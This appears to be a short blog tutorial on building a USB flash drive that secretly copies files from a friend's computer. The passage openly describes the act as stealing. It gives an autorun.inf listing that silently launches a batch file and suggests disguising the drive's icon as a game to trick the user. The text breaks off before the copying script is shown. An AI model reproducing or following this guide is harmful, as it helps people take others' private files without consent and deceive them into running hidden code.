How to copy (steal) files from a computer to a pendrive
hello guys, have you ever want something from your friend pc, that he is not giving you like games, movies, important files etc.here I come with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act. Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive. STEP 1 Open Notepad (I recommend Notepad++) and copy-paste the following lines. [autorun] icon= drive.ico open= launch.bat action=Click OK to Run shell\open\command= launch.bat Save this as autorun.inf The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something. The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending o...